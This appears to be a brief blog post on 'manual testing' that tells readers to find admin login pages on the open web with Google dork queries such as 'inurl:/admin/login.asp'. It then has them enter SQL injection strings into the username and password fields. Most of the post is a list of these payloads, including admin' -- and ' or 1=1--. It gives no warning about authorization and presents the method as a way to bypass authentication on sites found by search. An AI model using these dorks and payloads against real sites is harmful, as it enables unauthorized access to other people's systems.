Manual Testing

Authentication Bypass:

Search for login or Admin login Pages.

ex: google dork. Go to google Home page

in search bar type..  " inurl:/admin/login.asp" or
                                    " inurl: /adminlogin.asp"  ...somewhat   like that


put the sql magic qoutes in username and password fields.There are many sql quotes like :


  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • ='or''='

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More